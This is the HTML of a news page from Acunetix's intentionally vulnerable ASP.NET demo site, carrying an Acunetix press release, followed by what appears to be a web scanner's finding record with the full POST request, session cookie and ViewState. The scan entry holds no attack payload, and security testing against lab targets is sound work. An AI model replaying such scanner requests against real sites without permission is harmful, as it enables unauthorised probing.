powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10969 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,969 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4%2BL8NgEI5fU11kxKVg%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKsmpfVDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow